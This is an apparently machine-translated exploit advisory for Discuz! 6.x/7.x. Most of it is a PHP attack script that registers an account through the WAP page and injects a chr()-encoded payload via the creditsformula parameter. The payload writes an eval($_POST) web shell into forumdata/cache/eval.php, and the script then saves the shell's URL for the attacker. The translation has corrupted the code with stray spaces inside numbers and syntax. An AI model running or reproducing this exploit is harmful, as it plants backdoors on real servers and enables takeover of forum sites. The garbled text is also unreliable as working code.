Discuz! 6. x/7. x SODB-2 0 0 8-1 3 Exp full automatically obtain the SHELL with the log-vulnerability warning-the black bar safety net

2009-01-07T00:00:00
ID MYHACK58:62200921848
Type myhack58
Reporter 佚名
Modified 2009-01-07T00:00:00

Description

`================Discuz.php=========================

!/ usr/bin/php

<? php /* * Discuz! 6. x/7. x SODB-2 0 0 8-1 3 Exp * By www.80vul.com * Notes the value of the variable, add your own modifications /

if ($argc<3) { print_r('


Usage: php '.$ argv[0].' host path host: target server (ip/hostname),without"http://" path: path to phpcms Example: php '.$ argv[0].' localhost /


'); die; } // $host = 'www.80vul.com'; // Server domain or IP // $path = '/'; // Program to the path where these have been by the parameter acquisition, do not trouble you....... $host=$argv[1]; $path=$argv[2]; $key = 1; // The above variable is edited, make will the value here to 1,has been changing for the better......

if (strpos($host, '://') !== false || strpos($path, '/') === false || $key !== 1) exit("a professional point well,the first look inside the comments -,-\n");

error_reporting(7); ini_set('max_execution_time', 0);

$key = time(); $cmd = 'action=register&username='.$ key.'& password='.$ key.'& email='.$ key.'@ 80vul. com&_DCACHE=1'; $resp = send();

preg_match('/logout=yes&formhash=[a-z0-9]{8}&sid=([a-zA-Z0-9]{6})/', $resp, $sid);

if (!$ sid) exit("Oh,is probably not turned on the WAP registration! The detection of the next......\ n");

$cmd = 'stylejump[1]=1&styleid=1&inajax=1&transsidstatus=1&sid='.$ sid[1].'& creditsformula=${${fputs(fopen(chr(4 6). chr(4 6). chr(4 7). chr(1 0 2). chr(1 1 1). chr(1 1 4). chr(1 1 7). chr(1 0 9). chr(1 0 0). chr(9 7). chr(1 1 6). chr(9 7). chr(4 7). chr(9 9). chr(9 7). chr(9 9). chr(1 0 4). chr(1 0 1). chr(4 7). chr(1 0 1). chr(1 1 8). chr(9 7). chr(1 0 8). chr(4 6). chr(1 1 2). chr(1 0 4). chr(1 1 2),chr(1 1 9). chr(4 3)),chr(6 0). chr(6 3). chr(1 0 1). chr(1 1 8). chr(9 7). chr(1 0 8). chr(4 0). chr(3 6). chr(9 5). chr(8 0). chr(7 9). chr(8 3). chr(8 4). chr(9 1). chr(9 9). chr(9 3). chr(4 1). chr(6 3). chr(6 2). chr(5 6). chr(4 8). chr(1 1 8). chr(1 1 7). chr(1 0 8))}}'; send();

$shell = 'http://'.$ host.$ path.'forumdata/cache/eval.php';

if (file_get_contents($shell) == '80vul') { $filename = "resulturl.txt"; $handle = fopen ($filename,"a+"); //open the file pointer, create a file / Check whether the file is created and writable / if (! is_writable ($filename)){ die ("file:".$ filename." Not writable, check its properties after the retry!"); } /Here write successful the following should be no problem, not much testing./ if (! fwrite ($handle,$shell)){ //writes information to file die ("generate file".$ filename." Failed!"); } fwrite($handle,"\r\n"); fclose ($handle); //close the pointer

exit("\n save Shell successfully!\ nWebShell:\t$shell\n"); } else exit("probably the site does not exist vulnerability,for a!\ n");

function send() { global $host, $path, $url, $cmd;

$data = "POST ".$ path."wap/index.php HTTP/1.1\r\n"; $data .= "Accept: /\r\n"; $data .= "Accept-Language: zh-cn\r\n"; $data .= "Referer: http://$host$path\r\n"; $data .= "Content-Type: application/x-www-form-urlencoded\r\n"; $data .= "User-Agent: Opera/9.62 (X11; Linux i686; U; zh-cn) Presto/2.1.1\r\n"; $data .= "Host: $host\r\n"; $data .= "Connection: Close\r\n"; $data .= "Content-Length: ". strlen($cmd)."\ r\n\r\n"; $data .= $cmd;

$fp = fsockopen($host, 8 0); fputs($fp, $data);

$resp = ";

while ($fp && ! feof($fp)) $resp .= fread($fp, 1 0 2 4);

return $resp; }

?> ======================END===================== `Write a batch is not wordy, the front one has told you.......